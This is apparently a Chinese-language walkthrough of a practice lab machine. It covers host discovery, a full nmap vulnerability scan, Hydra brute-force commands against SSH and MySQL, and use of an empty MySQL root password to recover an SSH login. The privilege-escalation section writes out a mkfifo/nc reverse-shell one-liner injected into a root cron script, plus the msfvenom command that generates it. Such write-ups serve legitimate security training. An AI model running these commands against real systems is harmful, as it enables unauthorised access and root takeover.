一、主机发现
使用netdiscover
,发现主机IP为192.168.203.145
.
二、端口探测
使用Nmap
:
root@kali:~# nmap -sS -A 192.168.203.145 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 08:49 CST
Nmap scan report for 192.168.203.145
Host is up (0.00051s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:7.4:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /info.php: Possible information file
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| vulners:
| cpe:/a:apache:http_server:2.4.6:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117
| CVE-2013-4352 4.3 https://vulners.com/cve/CVE-2013-4352
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
3306/tcp open mysql MySQL 5.5.60-MariaDB
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| MySQL 5.5.60-MariaDB:
|_ NODEJS:602 0.0 https://vulners.com/nodejs/NODEJS:602
MAC Address: 00:0C:29:79:43:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.51 ms 192.168.203.145
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.70 seconds
目标机器开放了22
、80
、3306
三、漏洞寻找
通过Nmap的检测发现了一个info.php
,我们先访问一下web服务。
是一个网站的测试页。
查看info.php
:
接下来,利用dirb
对目录进行扫描:
也是没有什么新发现的,那就只剩下爆破ssh和mysql了。
爆破工具使用Hydra
:
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.203.145
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.203.145
爆破了很久也没有成功,最终发现mysql是一个空密码登录!
我们直接使用mysql -h 192.168.203.145 -u root -p
登录:
经过一番查找,最终在ssh
数据库中,找到了一个ssh账号和密码:
MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | mistic | testP@$$swordmistic |
+----+----------+---------------------+
四、提权
使用命令:ssh -p22 mistic@192.168.203.145
,连接ssh。
成功登录!
现在我们必须拿到root权限才可以读取/root
目录下的flag。
使用sudo -l
发现,该用户并不可以执行:
使用find / type f -perm -u=s 2>/dev/null
,查找suid权限的程序。
发现了计划任务crontab
。或许我们可以利用此进行提权。
查看计划任务:cat /etc/crontab
发现果然有一个root用户运行的脚本,并且当前用户mistic
对此脚本可写!
我们使用命令:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.203.129 7777 >/tmp/f" > logrot.sh
将反弹shell的代码写入logrot.sh
>
和>>
的区别,前者是将文件内容覆盖,后者是追加。之前在做DC-7的时候,不知道这个命令咋搞出来的,现在知道了,是msf的命令。如下:
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.203.129 LPORT=7777 R
言归正传,写入命令之后,我们开启监听nc -lvp 7777
,稍等一会儿我们便拿到了root的shell。
成功读取flag。